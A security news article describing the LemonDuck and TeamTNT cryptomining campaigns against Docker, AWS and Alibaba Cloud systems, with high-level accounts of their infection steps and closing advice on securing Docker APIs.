The ongoing cryptomining malware campaign targets Docker servers

Cryptocurrency mining malware LemonDuck and other teams target cloud platforms

Cloud platforms targeted by the cryptocurrency mining malware

The cross-platform cryptocurrency mining botnet aims at Docker, AWS, and Alibaba cloud to mine crypto on Linux systems. This was an active malware campaign, as reports reveal.^[1] This large-scale Monero cryptocurrency miner campaign runs anonymously.^[2] The miner operates by using the proxy pools, which hide the wallet addresses. It manages to evade detections by targeting Alibaba Cloud and its monitoring service. Also, disabling it.

LemonDuck previously focused on exploiting vulnerable Microsoft Exchange servers and targeted Linux machines vis SSH brute force attacks.^[3] The threat targeted Windows systems vulnerable to SMBGhost and servers running Redis and Hadoop instances.

The particular malware is also capable of stealing credentials, facilitating the deployment of other malware payloads, and triggering follow-up attacks. These crypto-mining malware gangs are a huge threat to poorly secured or misconfigured Docker systems. These campaigns can be mass-exploited, and these numbers rise to the top over the few years.^[4]

LemonDuck campaign details

The particular malware uses various spreading methods. Those can include phishing emails, exploits, USB devices, and brute force attacks. There is evidence that the malware can take advantage of news and events related to new exploits, so the creators can run successful campaigns using them immediately.^[5] There have been attacks when LemonDuck leveraged the newly patched vulnerabilities to gain access to machines and release backdoors and information stealers on those machines.

The latest campaign shows that the malware uses exposed Docker APIs and gains initial access to the systems. Uses this vector to run a rogue container and retrieve the Bash shell script file that is disguised as a harmless PNG image file from the remote server. The bash file can:

• kill processes based on names of mining pools, competing mining groups;
• kill daemons;
• delete indicators of compromise file paths;
• kill network connections to c&c servers that belong to competing groups;
• disable Alibaba Cloud monitoring service that protects from suspicious activities.

Once these actions are launched, the script downloads and runs the XMRig miner malware and triggers the launch of the configuration file that hides wallets belonging to actors behind proxy pools. Malware can attempt lateral movement and repeat the same infection processes leveraging the SSH keys found on the filesystem.

TeamTNT with a history of targeting cloud infrastructures

These reports come right after the exposure of another group related to cryptocurrency miner malware distribution. The TeamTNT targets AWS, and Alibaba Cloud for cryptojacking and backdoor deployment. The payload of this malware also seems to be modified to respond to particular public discourse and is designed to aim at Amazon Web Services while disabling the could security solutions at the same time.^[6]

The team aims to disable the could security services to evade detection and continue to mine Monero, Ether, and Bitcoin for as long as possible and without interruption. These reports show how important it is to keep these Docker threats in check.

Admins need to take care of the Docker API deployment secure configuration. It can be started by checking the best practices and security recommendations. Implementing strict authentication policies and enforcing the principles of least privilege.